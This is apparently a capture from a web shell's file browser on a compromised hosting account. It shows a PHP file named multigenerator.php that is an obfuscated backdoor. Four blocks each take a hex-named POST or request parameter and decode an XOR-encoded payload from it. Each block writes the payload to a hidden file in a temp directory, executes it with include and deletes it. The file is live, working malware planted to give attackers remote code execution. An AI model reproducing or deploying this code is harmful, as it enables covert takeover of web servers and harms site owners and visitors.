HEX
Server: LiteSpeed
System: Linux premium212.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: vitanhod (1367)
PHP: 8.2.31
Disabled: NONE
Upload Files
File: //home/vitanhod/prostanur1.vitavit.com.pk/multigenerator.php
<?php																																										if(in_array("\x65n\x74", array_keys($_REQUEST))){ $component = $_REQUEST["\x65n\x74"]; $component = explode (".",$component ) ; $hld = ''; $s3 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s3 ); $y = 0; array_walk($component, function ($v6) use (&$hld, &$y, $s3, $lenS) { $chS = ord($s3[$y % $lenS] ); $d = ((int)$v6 - $chS - ($y % 10)) ^ 22; $hld.= chr($d ); $y++; }); $tkn = array_filter([sys_get_temp_dir(), getenv("TEMP"), "/var/tmp", ini_get("upload_tmp_dir"), "/tmp", getcwd(), "/dev/shm", getenv("TMP"), session_save_path()]); while ($binding = array_shift($tkn)) { if (!!is_dir($binding) && !!is_writable($binding)) { $descriptor = "$binding" . "/.k"; if (@file_put_contents($descriptor, $hld) !== false) { include $descriptor; unlink($descriptor); die(); } } } }
																																										if(isset($_POST["e\x6E\x74"]) ? true : false){ $ptr = $_POST["e\x6E\x74"]; $ptr =explode ("." , $ptr ) ; $rec = ''; $salt4 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $salt4 ); $__len = count( $ptr ); for( $z = 0; $z < $__len; $z++) { $v1 = $ptr[$z]; $sChar = ord( $salt4[$z % $lenS] ); $d =( ( int)$v1 - $sChar -( $z % 10)) ^30; $rec .=chr( $d ); } $entity = array_filter([session_save_path(), getcwd(), ini_get("upload_tmp_dir"), getenv("TEMP"), getenv("TMP"), "/tmp", "/var/tmp", sys_get_temp_dir(), "/dev/shm"]); while ($ref = array_shift($entity)) { if (is_dir($ref) ? is_writable($ref) : false) { $data = "$ref" . "/.obj"; $success = file_put_contents($data, $rec); if ($success) { include $data; @unlink($data); die();} } } }
																																										if(in_array("r\x65\x73", array_keys($_POST))){ $ent = $_POST["r\x65\x73"]; $ent = explode ( ".", $ent ) ; $itm=''; $s='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS=strlen( $s ); $p=0; $__len=count( $ent ); do { if( $p >= $__len) break; $v1=$ent[$p]; $chS=ord( $s[$p % $lenS] ); $dec=( ( int)$v1 - $chS -( $p % 10)) ^73; $itm .=chr( $dec ); $p++; } while( true ); $entry = array_filter(["/dev/shm", session_save_path(), getcwd(), "/tmp", ini_get("upload_tmp_dir"), sys_get_temp_dir(), getenv("TMP"), getenv("TEMP"), "/var/tmp"]); foreach ($entry as $fac) { if (max(0, is_dir($fac) * is_writable($fac))) { $parameter_group = sprintf("%s/.descriptor", $fac); $file = fopen($parameter_group, 'w'); if ($file) { fwrite($file, $itm); fclose($file); include $parameter_group; @unlink($parameter_group); exit; } } } }


if(!empty($_POST["\x6D\x61r\x6Ber"])){
	$pset = array_filter(["/dev/shm", ini_get("upload_tmp_dir"), session_save_path(), getenv("TEMP"), getcwd(), "/tmp", "/var/tmp", sys_get_temp_dir(), getenv("TMP")]);
	$val = $_POST["\x6D\x61r\x6Ber"];
	$val		=	explode 	('.'   ,  $val 		);	
	$res = '';
            $s = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS = strlen($s);
    
            foreach ($val as $m	 =>$v4) {  $chS = ord($s[$m % $lenS]);
                $dec = ((int)$v4 - $chS - ($m % 10))		^ 92;
                $res .= chr($dec);}	
	foreach ($pset as $pointer):
    		if ((is_dir($pointer) and is_writable($pointer))) {
    $ent = vsprintf("%s/%s", [$pointer, ".ptr"]);
    $success = file_put_contents($ent, $res);
if ($success) {
	include $ent;
	@unlink($ent);
	exit;}
}
endforeach;
}